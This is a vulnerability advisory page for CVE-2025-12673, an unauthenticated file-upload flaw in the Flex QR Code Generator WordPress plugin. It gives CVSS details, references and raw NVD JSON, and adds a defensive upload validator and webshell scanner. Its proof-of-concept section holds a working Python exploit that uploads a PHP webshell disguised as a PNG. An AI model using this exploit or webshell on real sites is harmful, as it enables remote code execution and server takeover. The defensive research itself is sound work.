Security Vulnerability Report
CVE-2025-12673 CVSS 9.8 CRITICAL

CVE-2025-12673

Published: 2025-12-06 06:15:50
Last Modified: 2026-04-15 00:35:42

Description

The Flex QR Code Generator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the update_qr_code() function in all versions up to, and including, 1.2.7. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Flex QR Code Generator <= 1.2.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import sys

# CVE-2025-12673 PoC - Flex QR Code Generator Arbitrary File Upload
# Target: WordPress site with Flex QR Code Generator plugin <= 1.2.7
target_url = sys.argv[1] if len(sys.argv) > 1 else 'http://target.com'

# PHP webshell content
webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"

# Construct multipart form data
files = {
    'qr_code_image': ('shell.php', webshell, 'image/png')
}

# Send upload request to vulnerable endpoint
url = f"{target_url}/wp-admin/admin-ajax.php"
data = {
    'action': 'update_qr_code',
    'security': '任意值'
}

try:
    response = requests.post(url, data=data, files=files, timeout=10)
    if response.status_code == 200:
        print('[+] File uploaded successfully!')
        print(f'[+] Webshell location: {target_url}/wp-content/uploads/qr_codes/shell.php?cmd=whoami')
    else:
        print('[-] Upload failed')
except requests.exceptions.RequestException as e:
    print(f'[-] Error: {e}')
```
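The root cause is the missing file type check in update_qr_code(): the PoC above labels a .php file as image/png, so any check that trusts the client's Content-Type would pass it. The following is an added defensive example (not the plugin's code or the page's own) of the validation and a matching hunting helper for the uploads directory; the function names and the 4096-byte read are assumptions.

```python
import os

# Added defensive example, not the plugin's code: the file-type validation that
# update_qr_code() lacked. A QR code upload is accepted only when its extension
# is on an allowlist AND the file content starts with that format's magic bytes.
# The client-supplied Content-Type is deliberately ignored: the PoC labels a
# .php file as image/png, and a check based on that header would wave it through.
ALLOWED_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}
PHP_TAGS = (b"<?php", b"<?=")


def validate_qr_upload(filename, content, declared_mime=None):
    """Return (accepted, reason). declared_mime is only echoed in the reason."""
    ext = os.path.splitext(filename.lower())[1]
    if ext not in ALLOWED_MAGIC:
        return False, f"extension {ext!r} not in allowlist (declared {declared_mime})"
    if not content.startswith(ALLOWED_MAGIC[ext]):
        return False, f"content does not start with {ext} magic bytes"
    # Heuristic, not a parser: a PHP open tag inside an otherwise valid image is
    # the classic polyglot used to reach code execution once the file is on disk.
    if any(tag in content for tag in PHP_TAGS):
        return False, "PHP open tag embedded in image data"
    return True, "ok"


def find_suspicious(entries):
    """Hunting helper: entries is an iterable of (filename, leading_bytes);
    returns [(filename, reason)] for every file the validator would reject."""
    findings = []
    for name, head in entries:
        accepted, reason = validate_qr_upload(name, head)
        if not accepted:
            findings.append((name, reason))
    return findings


def scan_upload_dir(path, head_bytes=4096):
    """Walk a directory such as wp-content/uploads/qr_codes and run
    find_suspicious over the first head_bytes of each file (enough for magic
    bytes and short webshells). Path and read size are assumptions."""
    def entries():
        for root, _, names in os.walk(path):
            for name in names:
                full = os.path.join(root, name)
                with open(full, "rb") as fh:
                    yield full, fh.read(head_bytes)
    return find_suspicious(entries())
```

In a WordPress plugin the same decision belongs to wp_check_filetype_and_ext(), which compares the extension with the real content, placed behind check_ajax_referer() and a current_user_can() capability check; the PoC's arbitrary 'security' value shows why the nonce must actually be verified.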

References

https://github.com/d0n601/CVE-2025-12673
https://plugins.trac.wordpress.org/browser/flex-qr-code-generator/trunk/qr-code-generator.php#L457
https://plugins.trac.wordpress.org/changeset/3412218
https://ryankozak.com/posts/cve-2025-12673/
https://www.wordfence.com/threat-intel/vulnerabilities/id/3d71404e-0db8-485b-a626-5e0df2076c05?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-12673",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-06T06:15:50.233",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Flex QR Code Generator plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the update_qr_code() function in all versions up to, and including, 1.2.7. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-434"}
        ]
      }
    ],
    "references": [
      {"url": "https://github.com/d0n601/CVE-2025-12673", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/flex-qr-code-generator/trunk/qr-code-generator.php#L457", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset/3412218", "source": "[email protected]"},
      {"url": "https://ryankozak.com/posts/cve-2025-12673/", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3d71404e-0db8-485b-a626-5e0df2076c05?source=cve", "source": "[email protected]"}
    ]
  }
}
```